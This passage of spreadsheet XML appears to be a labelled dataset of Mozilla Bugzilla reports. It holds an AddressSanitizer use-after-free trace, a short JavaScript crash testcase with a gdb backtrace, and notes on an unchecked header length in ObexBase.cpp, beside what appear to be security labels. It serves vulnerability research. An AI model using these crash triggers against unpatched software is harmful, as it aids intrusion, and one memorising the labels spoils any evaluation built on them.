&gt;    #11 0x7f6f611b7278 in NS_ProcessNextEvent(nsIThread*, bool) xpcom/threads/nsThreadUtils.cpp:472:10
&gt;    #12 0x7f6f61d67896 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:338:20
&gt;    #13 0x7f6f61ccd9ed in RunHandler ipc/chromium/src/base/message_loop.cc:231:3
&gt;    #14 0x7f6f61ccd9ed in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:211
&gt;    #15 0x7f6f611a650f in nsThread::ThreadFunc(void*) xpcom/threads/nsThread.cpp:501:11
&gt;    #16 0x7f6f775d222c in _pt_root nsprpub/pr/src/pthreads/ptthread.c:216:5
&gt;    #17 0x7f6f7aec2183 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8183)
&gt;
&gt;previously allocated by thread T104 (DOM Worker) here:
&gt;    #0 0x4e8be8 in malloc /build/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:66
&gt;    #1 0x52622d in moz_xmalloc memory/mozalloc/mozalloc.cpp:83:17
&gt;    #2 0x7f6f64b9c3d9 in operator new objdir-ff-asan/dist/include/mozilla/mozalloc.h:194:12
&gt;    #3 0x7f6f64b9c3d9 in mozilla::dom::Request::Constructor(mozilla::dom::GlobalObject const&amp;, mozilla::dom::RequestOrUSVString const&amp;, mozilla::dom::RequestInit const&amp;, mozilla::ErrorResult&amp;) dom/fetch/Request.cpp:581
&gt;    #4 0x7f6f63c1c7c6 in mozilla::dom::RequestBinding::_constructor(JSContext*, unsigned int, JS::Value*) objdir-ff-asan/dom/bindings/RequestBinding.cpp:1851:53
&gt;    #5 0x7f6f697c0069 in CallJSNative js/src/jscntxtinlines.h:293:15
&gt;    #6 0x7f6f697c0069 in CallJSNativeConstructor js/src/jscntxtinlines.h:326
&gt;    #7 0x7f6f697c0069 in InternalConstruct(JSContext*, js::AnyConstructArgs const&amp;) js/src/vm/Interpreter.cpp:573
&gt;    #8 0x7f6f697bfe2c in js::ConstructFromStack(JSContext*, JS::CallArgs const&amp;) js/src/vm/Interpreter.cpp:599:12
&gt;    #9 0x7f6f6979b493 in Interpret(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:3056:18
&gt;    #10 0x7f6f697941bb in js::RunScript(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:410:12
&gt;    #11 0x7f6f697c153a in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) js/src/vm/Interpreter.cpp:699:15
&gt;    #12 0x7f6f697c1ec1 in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) js/src/vm/Interpreter.cpp:731:12
&gt;    #13 0x7f6f69efa8ea in Evaluate(JSContext*, js::ScopeKind, JS::Handle&lt;JSObject*&gt;, JS::ReadOnlyCompileOptions const&amp;, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JS::Value&gt;) js/src/jsapi.cpp:4662:19
&gt;    #14 0x7f6f69efac60 in JS::Evaluate(JSContext*, JS::ReadOnlyCompileOptions const&amp;, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JS::Value&gt;) js/src/jsapi.cpp:4727:12
&gt;    #15 0x7f6f65a537ee in (anonymous namespace)::ScriptExecutorRunnable::WorkerRun(JSContext*, mozilla::dom::workers::WorkerPrivate*) dom/workers/ScriptLoader.cpp:1969:10
&gt;    #16 0x7f6f65ae4ad1 in mozilla::dom::workers::WorkerRunnable::Run() dom/workers/WorkerRunnable.cpp:374:12
&gt;    #17 0x7f6f611ad373 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:1406:14
&gt;    #18 0x7f6f611b7278 in NS_ProcessNextEvent(nsIThread*, bool) xpcom/threads/nsThreadUtils.cpp:472:10
&gt;    #19 0x7f6f65ad11b3 in mozilla::dom::workers::WorkerPrivate::RunCurrentSyncLoop() dom/workers/WorkerPrivate.cpp:5874:7
&gt;    #20 0x7f6f65a16e51 in (anonymous namespace)::LoadAllScripts(mozilla::dom::workers::WorkerPrivate*, nsTArray&lt;(anonymous namespace)::ScriptLoadInfo&gt;&amp;, bool, mozilla::dom::workers::WorkerScriptType, mozilla::ErrorResult&amp;) dom/workers/ScriptLoader.cpp:2127:12
&gt;    #21 0x7f6f65a169b0 in mozilla::dom::workers::scriptloader::LoadMainScript(mozilla::dom::workers::WorkerPrivate*, nsAString const&amp;, mozilla::dom::workers::WorkerScriptType, mozilla::ErrorResult&amp;) dom/workers/ScriptLoader.cpp:2245:3
&gt;    #22 0x7f6f65af35bb in (anonymous namespace)::CompileScriptRunnable::WorkerRun(JSContext*, mozilla::dom::workers::WorkerPrivate*) dom/workers/WorkerPrivate.cpp:586:5
&gt;    #23 0x7f6f65ae4ad1 in mozilla::dom::workers::WorkerRunnable::Run() dom/workers/WorkerRunnable.cpp:374:12
&gt;    #24 0x7f6f611ad373 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:1406:14
&gt;    #25 0x7f6f611b7278 in NS_ProcessNextEvent(nsIThread*, bool) xpcom/threads/nsThreadUtils.cpp:472:10
&gt;    #26 0x7f6f65acb4fb in mozilla::dom::workers::WorkerPrivate::DoRunLoop(JSContext*) dom/workers/WorkerPrivate.cpp:5115:7
&gt;    #27 0x7f6f65a47ebb in (anonymous namespace)::WorkerThreadPrimaryRunnable::Run() dom/workers/RuntimeService.cpp:2919:25
&gt;    #28 0x7f6f611ad373 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:1406:14
&gt;    #29 0x7f6f611b7278 in NS_ProcessNextEvent(nsIThread*, bool) xpcom/threads/nsThreadUtils.cpp:472:10
&gt;    #30 0x7f6f61d67896 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:338:20
&gt;    #31 0x7f6f61ccd9ed in RunHandler ipc/chromium/src/base/message_loop.cc:231:3
&gt;    #32 0x7f6f61ccd9ed in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:211
&gt;    #33 0x7f6f611a650f in nsThread::ThreadFunc(void*) xpcom/threads/nsThread.cpp:501:11
&gt;
&gt;Thread T104 (DOM Worker) created by T0 (Web Content) here:
&gt;    #0 0x4362cd in __interceptor_pthread_create /build/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:314
&gt;    #1 0x7f6f775cee35 in _PR_CreateThread nsprpub/pr/src/pthreads/ptthread.c:457:14
&gt;    #2 0x7f6f775cea2e in PR_CreateThread nsprpub/pr/src/pthreads/ptthread.c:548:12
&gt;    #3 0x7f6f611a83d1 in nsThread::Init(nsACString const&amp;) xpcom/threads/nsThread.cpp:683:8
&gt;    #4 0x7f6f65aeeecb in mozilla::dom::workers::WorkerThread::Create(mozilla::dom::workers::WorkerThreadFriendKey const&amp;) dom/workers/WorkerThread.cpp:90:7
&gt;    #5 0x7f6f65a0edc1 in mozilla::dom::workers::RuntimeService::ScheduleWorker(mozilla::dom::workers::WorkerPrivate*) dom/workers/RuntimeService.cpp:1918:14
&gt;    #6 0x7f6f65a0d298 in mozilla::dom::workers::RuntimeService::RegisterWorker(mozilla::dom::workers::WorkerPrivate*) dom/workers/RuntimeService.cpp:1745:19
&gt;    #7 0x7f6f65ac8533 in mozilla::dom::workers::WorkerPrivate::Constructor(JSContext*, nsAString const&amp;, bool, mozilla::dom::WorkerType, nsAString const&amp;, nsACString const&amp;, mozilla::dom::workers::WorkerLoadInfo*, mozilla::ErrorResult&amp;) dom/workers/WorkerPrivate.cpp:4657:24
&gt;    #8 0x7f6f65ac7e1d in mozilla::dom::workers::WorkerPrivate::Constructor(mozilla::dom::GlobalObject const&amp;, nsAString const&amp;, bool, mozilla::dom::WorkerType, nsAString const&amp;, mozilla::dom::workers::WorkerLoadInfo*, mozilla::ErrorResult&amp;) dom/workers/WorkerPrivate.cpp:4574:10
&gt;    #9 0x7f6f65ac7daf in mozilla::dom::workers::WorkerPrivate::Constructor(mozilla::dom::GlobalObject const&amp;, nsAString const&amp;, mozilla::dom::WorkerOptions const&amp;, mozilla::ErrorResult&amp;) dom/workers/WorkerPrivate.cpp:4515:10
&gt;    #10 0x7f6f642848bf in mozilla::dom::WorkerBinding::_constructor(JSContext*, unsigned int, JS::Value*) objdir-ff-asan/dom/bindings/WorkerBinding.cpp:971:68
&gt;    #11 0x7f6f697c0069 in CallJSNative js/src/jscntxtinlines.h:293:15
&gt;    #12 0x7f6f697c0069 in CallJSNativeConstructor js/src/jscntxtinlines.h:326
&gt;    #13 0x7f6f697c0069 in InternalConstruct(JSContext*, js::AnyConstructArgs const&amp;) js/src/vm/Interpreter.cpp:573
&gt;    #14 0x7f6f697bfe2c in js::ConstructFromStack(JSContext*, JS::CallArgs const&amp;) js/src/vm/Interpreter.cpp:599:12
&gt;    #15 0x7f6f6979b493 in Interpret(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:3056:18
&gt;    #16 0x7f6f697941bb in js::RunScript(JSContext*, js::RunState&amp;) js/src/vm/Interpreter.cpp:410:12
&gt;    #17 0x7f6f697c153a in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) js/src/vm/Interpreter.cpp:699:15
&gt;    #18 0x7f6f697c1ec1 in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) js/src/vm/Interpreter.cpp:731:12
&gt;    #19 0x7f6f69ef98ee in ExecuteScript(JSContext*, JS::AutoObjectVector&amp;, JS::Handle&lt;JSScript*&gt;, JS::Value*) js/src/jsapi.cpp:4578:12
&gt;    #20 0x7f6f69ef95c4 in JS_ExecuteScript(JSContext*, JS::AutoObjectVector&amp;, JS::Handle&lt;JSScript*&gt;, JS::MutableHandle&lt;JS::Value&gt;) js/src/jsapi.cpp:4599:12
&gt;    #21 0x7f6f63547b68 in nsJSUtils::ExecutionContext::CompileAndExec(JS::CompileOptions&amp;, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JSScript*&gt;) dom/base/nsJSUtils.cpp:267:8
&gt;    #22 0x7f6f65e2fd93 in mozilla::dom::ScriptLoader::EvaluateScript(mozilla::dom::ScriptLoadRequest*) dom/script/ScriptLoader.cpp:2129:25
&gt;    #23 0x7f6f65e2d254 in mozilla::dom::ScriptLoader::ProcessRequest(mozilla::dom::ScriptLoadRequest*) dom/script/ScriptLoader.cpp:1725:10
&gt;    #24 0x7f6f65e1bf5b in mozilla::dom::ScriptLoader::ProcessScriptElement(nsIScriptElement*) dom/script/ScriptLoader.cpp:1427:10
&gt;    #25 0x7f6f65e19a3c in mozilla::dom::ScriptElement::MaybeProcessScript() dom/script/ScriptElement.cpp:149:18
&gt;    #26 0x7f6f6289453d in nsIScriptElement::AttemptToExecute() objdir-ff-asan/dist/include/nsIScriptElement.h:225:18
&gt;    #27 0x7f6f62893b13 in nsHtml5TreeOpExecutor::RunScript(nsIContent*) parser/html/nsHtml5TreeOpExecutor.cpp:698:22
&gt;    #28 0x7f6f6288f693 in nsHtml5TreeOpExecutor::RunFlushLoop() parser/html/nsHtml5TreeOpExecutor.cpp:499:7
&gt;    #29 0x7f6f62897265 in nsHtml5ExecutorFlusher::Run() parser/html/nsHtml5StreamParser.cpp:129:20
&gt;    #30 0x7f6f611827c8 in mozilla::SchedulerGroup::Runnable::Run() xpcom/threads/SchedulerGroup.cpp:359:25
&gt;    #31 0x7f6f611ad373 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:1406:14
&gt;    #32 0x7f6f611b7278 in NS_ProcessNextEvent(nsIThread*, bool) xpcom/threads/nsThreadUtils.cpp:472:10
&gt;    #33 0x7f6f61d66358 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:96:21
&gt;    #34 0x7f6f61ccd9ed in RunHandler ipc/chromium/src/base/message_loop.cc:231:3
&gt;    #35 0x7f6f61ccd9ed in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:211
&gt;    #36 0x7f6f65f1b0fa in nsBaseAppShell::Run() widget/nsBaseAppShell.cpp:156:27
&gt;    #37 0x7f6f693d6aac in XRE_RunAppShell() toolkit/xre/nsEmbedFunctions.cpp:896:22
&gt;    #38 0x7f6f61ccd9ed in RunHandler ipc/chromium/src/base/message_loop.cc:231:3
&gt;    #39 0x7f6f61ccd9ed in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:211
&gt;    #40 0x7f6f693d6598 in XRE_InitChildProcess(int, char**, XREChildData const*) toolkit/xre/nsEmbedFunctions.cpp:712:34
&gt;    #41 0x524fc1 in content_process_main browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
&gt;    #42 0x524fc1 in main browser/app/nsBrowserApp.cpp:286
&gt;    #43 0x7f6f79ee7f44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
&gt;
&gt;SUMMARY: AddressSanitizer: heap-use-after-free dom/fetch/Fetch.cpp:1006:21 in mozilla::dom::(anonymous namespace)::ConsumeBodyDoneObserver&lt;mozilla::dom::Request&gt;::OnStreamComplete(nsIStreamLoader*, nsISupports*, nsresult, unsigned int, unsigned char const*)
&gt;Shadow bytes around the buggy address:
&gt;  0x0c1a80004ce0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x0c1a80004cf0: fa fa fa fa fa fa fa fa fa fa fa fa fd fd fd fd
&gt;  0x0c1a80004d00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
&gt;  0x0c1a80004d10: fa fa fa fa fa fa fd fd fd fd fd fd fd fd fd fd
&gt;  0x0c1a80004d20: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
&gt;=&gt;0x0c1a80004d30: fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd
&gt;  0x0c1a80004d40: fd fd fa fa fa fa fa fa fa fa fd fd fd fd fd fd
&gt;  0x0c1a80004d50: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
&gt;  0x0c1a80004d60: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
&gt;  0x0c1a80004d70: fd fd fd fd fd fa fa fa fa fa fa fa fa fa fa fa
&gt;  0x0c1a80004d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
&gt;Shadow byte legend (one shadow byte represents 8 application bytes):
&gt;  Addressable:           00
&gt;  Partially addressable: 01 02 03 04 05 06 07 
&gt;  Heap left redzone:       fa
&gt;  Freed heap region:       fd
&gt;  Stack left redzone:      f1
&gt;  Stack mid redzone:       f2
&gt;  Stack right redzone:     f3
&gt;  Stack after return:      f5
&gt;  Stack use after scope:   f8
&gt;  Global redzone:          f9
&gt;  Global init order:       f6
&gt;  Poisoned by user:        f7
&gt;  Container overflow:      fc
&gt;  Array cookie:            ac
&gt;  Intra object redzone:    bb
&gt;  ASan internal:           fe
&gt;  Left alloca redzone:     ca
&gt;  Right alloca redzone:    cb
&gt;==107957==ABORTING
&gt;</t>
        </is>
      </c>
      <c r="X3041" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3042">
      <c r="A3042" t="n">
        <v>581784</v>
      </c>
      <c r="B3042" t="inlineStr">
        <is>
          <t>2010-07-25 02:48:52 -0700</t>
        </is>
      </c>
      <c r="C3042" t="inlineStr">
        <is>
          <t>TM: Crash [@ JSObject::getClass]</t>
        </is>
      </c>
      <c r="D3042" t="inlineStr">
        <is>
          <t>2013-02-25 16:53:56 -0800</t>
        </is>
      </c>
      <c r="E3042" t="n">
        <v>1</v>
      </c>
      <c r="F3042" t="n">
        <v>1</v>
      </c>
      <c r="G3042" t="n">
        <v>3</v>
      </c>
      <c r="H3042" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3042" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3042" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3042" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3042" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3042" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3042" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3042" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3042" t="inlineStr">
        <is>
          <t>[sg:critical?][ccbr] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q3042" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3042" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3042" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3042" t="n">
        <v>1</v>
      </c>
      <c r="U3042" t="n">
        <v>0</v>
      </c>
      <c r="V3042" t="n">
        <v>12</v>
      </c>
      <c r="W3042" t="inlineStr">
        <is>
          <t>for (x = 0; x &lt; 4; x++) {
    (z = Function)()
}
crashes js debug shell with -j on TM tip at JSObject::getClass
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00000004
0x0000f211 in JSObject::getClass (this=0x0) at jsobj.h:306
306             return clasp;
(gdb) bt
#0  0x0000f211 in JSObject::getClass (this=0x0) at jsobj.h:306
#1  0x0000f2ea in JSObject::isFunction (this=0x0) at jsfun.h:253
#2  0x0018027c in IsFunctionObject (v=@0x10000f8) at jsfun.h:277
#3  0x001849e5 in js::NativeToValue (cx=0x809400, v=@0x10000f8, type=JSVAL_TYPE_NONFUNOBJ, slot=0x84ec08) at ../jstracer.cpp:2825
#4  0x001c14ad in js::FlushNativeStackFrameVisitor::visitStackSlots (this=0xbfffdfa8, vp=0x10000f8, count=2, fp=0x10000a0) at ../jstracer.cpp:3003
#5  0x00185196 in js::VisitFrameSlots&lt;js::FlushNativeStackFrameVisitor&gt; (visitor=@0xbfffdfa8, cx=0x809400, depth=0, i=@0xbfffdf50, up=0x0) at ../jstracer.cpp:1787
#6  0x0018604e in js::VisitStackSlots&lt;js::FlushNativeStackFrameVisitor&gt; (visitor=@0xbfffdfa8, cx=0x809400, callDepth=0) at ../jstracer.cpp:1809
#7  0x001860bd in js::FlushNativeStackFrame (cx=0x809400, callDepth=0, mp=0x86cfc8, np=0x84ec00, stopFrame=0x0, ignoreSlots=0) at ../jstracer.cpp:3372
#8  0x0018d273 in js::LeaveTree (tm=0x8375d4, state=@0xbfffe458, lr=0x86cf74) at ../jstracer.cpp:7025
#9  0x0018d4fb in js::DeepBail (cx=0x809400) at ../jstracer.cpp:7952
#10 0x0007101c in js::LeaveTrace (cx=0x809400) at jscntxt.h:2959
#11 0x00071250 in js_GetTopStackFrame (cx=0x809400) at jscntxt.h:2995
#12 0x0007294e in Function (cx=0x809400, obj=0x606910, argc=0, argv=0xbfffe3b8, rval=0xbfffe3c0) at ../jsfun.cpp:2128
#13 0x003eff45 in ?? ()
#14 0x001816f0 in js::ExecuteTrace (cx=0x809400, f=0x864244, state=@0xbfffe458) at ../jstracer.cpp:6598
#15 0x0018e0db in js::ExecuteTree (cx=0x809400, f=0x864244, inlineCallCount=@0xbfffecf0, innermostNestedGuardp=0xbfffe534, lrp=0xbfffe538) at ../jstracer.cpp:6699
#16 0x0019fd22 in js::MonitorLoopEdge (cx=0x809400, inlineCallCount=@0xbfffecf0, reason=js::Record_Branch) at ../jstracer.cpp:7186
#17 0x00095bb9 in js::Interpret (cx=0x809400) at ../jsinterp.cpp:3386
#18 0x000b3588 in js::Execute (cx=0x809400, chain=0x602000, script=0x40c140, down=0x0, flags=0, result=0xbffff680) at jsinterp.cpp:904
#19 0x00017cae in JS_ExecuteScript (cx=0x809400, obj=0x602000, script=0x40c140, rval=0xbffff680) at ../jsapi.cpp:4662
#20 0x0000cc36 in Process (cx=0x809400, obj=0x602000, filename=0x0, forceTTY=0) at ../../shell/js.cpp:532
#21 0x0000d60d in ProcessArgs (cx=0x809400, obj=0x602000, argv=0xbffff84c, argc=1) at ../../shell/js.cpp:853
#22 0x0000d726 in shell (cx=0x809400, argc=1, argv=0xbffff84c, envp=0xbffff854) at ../../shell/js.cpp:4949
#23 0x0000d84a in main (argc=1, argv=0xbffff84c, envp=0xbffff854) at ../../shell/js.cpp:5036
(gdb) x/i $eip
0xf211 &lt;_ZNK8JSObject8getClassEv+9&gt;:    mov    0x4(%eax),%eax
(gdb) x/b $eax 
0x0:    Cannot access memory at address 0x0</t>
        </is>
      </c>
      <c r="X3042" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3043">
      <c r="A3043" t="n">
        <v>421839</v>
      </c>
      <c r="B3043" t="inlineStr">
        <is>
          <t>2008-03-09 18:43:07 -0700</t>
        </is>
      </c>
      <c r="C3043" t="inlineStr">
        <is>
          <t>Crash [@ nsTypedSelection::ScrollPointIntoClipView] with toggling iframe, mousedown and mousemove</t>
        </is>
      </c>
      <c r="D3043" t="inlineStr">
        <is>
          <t>2013-09-13 07:32:32 -0700</t>
        </is>
      </c>
      <c r="E3043" t="n">
        <v>1</v>
      </c>
      <c r="F3043" t="n">
        <v>1</v>
      </c>
      <c r="G3043" t="n">
        <v>3</v>
      </c>
      <c r="H3043" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3043" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3043" t="inlineStr">
        <is>
          <t>DOM: Selection</t>
        </is>
      </c>
      <c r="K3043" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3043" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3043" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3043" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3043" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3043" t="inlineStr">
        <is>
          <t>[sg:critical?] method call on deleted nsView (post 1.8-branch)</t>
        </is>
      </c>
      <c r="Q3043" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3043" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3043" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T3043" t="n">
        <v>1</v>
      </c>
      <c r="U3043" t="n">
        <v>0</v>
      </c>
      <c r="V3043" t="n">
        <v>44</v>
      </c>
      <c r="W3043" t="inlineStr">
        <is>
          <t>Created attachment 308355
testcase
See testcase, to get the crash, download the testcase to your computer, because it makes use of enhanced privileges.
Then quickly move your mouse back and fort across the iframe.
I haven't been able to find a regression range. It seems like the latest builds are easier to crash. But I have been able to crash a 2008-01-02 build at least.
Maybe this will be fixed by the patch for bug 421083?
http://crash-stats.mozilla.com/report/index/3d1ebc57-ee42-11dc-8b8c-001a4bd46e84
0  	@0xa0b5ed8d  	
1 	nsTypedSelection::ScrollPointIntoClipView(nsPresContext*, nsIView*, nsPoint&amp;, int*) 	mozilla/layout/generic/nsSelection.cpp:5544
2 	nsTypedSelection::ScrollPointIntoView(nsPresContext*, nsIView*, nsPoint&amp;, int, int*) 	mozilla/layout/generic/nsSelection.cpp:5594
3 	nsTypedSelection::DoAutoScrollView(nsPresContext*, nsIView*, nsPoint&amp;, int) 	mozilla/layout/generic/nsSelection.cpp:5716
4 	nsTypedSelection::StartAutoScrollTimer(nsPresContext*, nsIView*, nsPoint&amp;, unsigned int) 	mozilla/layout/generic/nsSelection.cpp:5416
5 	nsFrame::HandleDrag(nsPresContext*, nsGUIEvent*, nsEventStatus*) 	mozilla/layout/generic/nsFrame.cpp:2144
6 	nsFrame::HandleEvent(nsPresContext*, nsGUIEvent*, nsEventStatus*) 	mozilla/layout/generic/nsFrame.cpp:1510
7 	nsPresShellEventCB::HandleEvent(nsEventChainPostVisitor&amp;) 	mozilla/layout/base/nsPresShell.cpp:1224
8 	xul.dll@0x2b1a59</t>
        </is>
      </c>
      <c r="X3043" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3044">
      <c r="A3044" t="n">
        <v>932496</v>
      </c>
      <c r="B3044" t="inlineStr">
        <is>
          <t>2013-10-29 14:24:05 -0700</t>
        </is>
      </c>
      <c r="C3044" t="inlineStr">
        <is>
          <t>ObexBase.cpp unsafe pointer increment</t>
        </is>
      </c>
      <c r="D3044" t="inlineStr">
        <is>
          <t>2015-02-25 21:53:14 -0800</t>
        </is>
      </c>
      <c r="E3044" t="n">
        <v>1</v>
      </c>
      <c r="F3044" t="n">
        <v>1</v>
      </c>
      <c r="G3044" t="n">
        <v>6</v>
      </c>
      <c r="H3044" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3044" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J3044" t="inlineStr">
        <is>
          <t>Bluetooth</t>
        </is>
      </c>
      <c r="K3044" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3044" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3044" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3044" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3044" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3044" t="inlineStr">
        <is>
          <t>[adv-main28+]</t>
        </is>
      </c>
      <c r="Q3044" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3044" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3044" t="inlineStr">
        <is>
          <t>1.3 Sprint 6 - 12/6</t>
        </is>
      </c>
      <c r="T3044" t="n">
        <v>1</v>
      </c>
      <c r="U3044" t="n">
        <v>0</v>
      </c>
      <c r="V3044" t="n">
        <v>38</v>
      </c>
      <c r="W3044" t="inlineStr">
        <is>
          <t>ObexBase.cpp defines a ParseHeaders() function that is responsible for parsing
a header. During parsing, ParseHeaders() extracts a device supplied 2-byte
contentLength from the header. Finally, ParseHeaders() increases a pointer by
that contentLength.
If ptr + contentLength &gt; aHeaderStart + aTotalLength then [1]  will read pass
the object.
The worst case scenario appears to be a crash caused by a malicious
contentLength.
[1] http://mxr.mozilla.org/mozilla-central/source/dom/bluetooth/ObexBase.cpp#118</t>
        </is>
      </c>
      <c r="X3044" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3045">
      <c r="A3045" t="n">
        <v>445104</v>
      </c>
      <c r="B3045" t="inlineStr">
        <is>
          <t>2008-07-14 01:52:00 -0700</t>
        </is>
      </c>
      <c r="C3045" t="inlineStr">
        <is>
          <t>ssl redirects come with a 200 OK HTTP code on mod_perl</t>
        </is>
      </c>
      <c r="D3045" t="inlineStr">
        <is>
          <t>2008-08-17 21:18:22 -0700</t>
        </is>
      </c>
      <c r="E3045" t="n">
        <v>1</v>
      </c>
      <c r="F3045" t="n">
        <v>1</v>
      </c>
      <c r="G3045" t="n">
        <v>4</v>
      </c>
      <c r="H3045" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3045" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3045" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K3045" t="inlineStr">
        <is>
          <t>3.1.4</t>
        </is>
      </c>
      <c r="L3045" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3045" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3045" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3045" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3045" t="inlineStr"/>
      <c r="Q3045" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3045" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3045" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T3045" t="n">
        <v>1</v>
      </c>
      <c r="U3045" t="n">
        <v>0</v>
      </c>
      <c r="V3045" t="n">
        <v>8</v>
      </c>
      <c r="W3045" t="inlineStr">
        <is>
          <t>Today I logged into my "ssl: authenticated sessions" mod_perl tip installation, and I got a 200 OK with a redirect message, instead of a 302. This looks like a regression from the recent ssl-redirect fix.</t>
        </is>
      </c>
      <c r="X3045" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3046">
      <c r="A3046" t="n">
        <v>822941</v>
      </c>
      <c r="B3046" t="inlineStr">
        <is>
          <t>2012-12-18 19:27:15 -0800</t>
        </is>
      </c>
      <c r="C3046" t="inlineStr">
        <is>
          <t>IonMonkey: Valgrind detects "Conditional jump or move depends on uninitialised value(s)" with js::detail::BumpChunk::new or js::LifoAlloc::getOrCreateChunk on the stack</t>
        </is>
      </c>
      <c r="D3046" t="inlineStr">
        <is>
          <t>2014-11-19 19:48:32 -0800</t>
        </is>
      </c>
      <c r="E3046" t="n">
        <v>1</v>
      </c>
      <c r="F3046" t="n">
        <v>1</v>
      </c>
      <c r="G3046" t="n">
        <v>3</v>
      </c>
      <c r="H3046" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3046" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
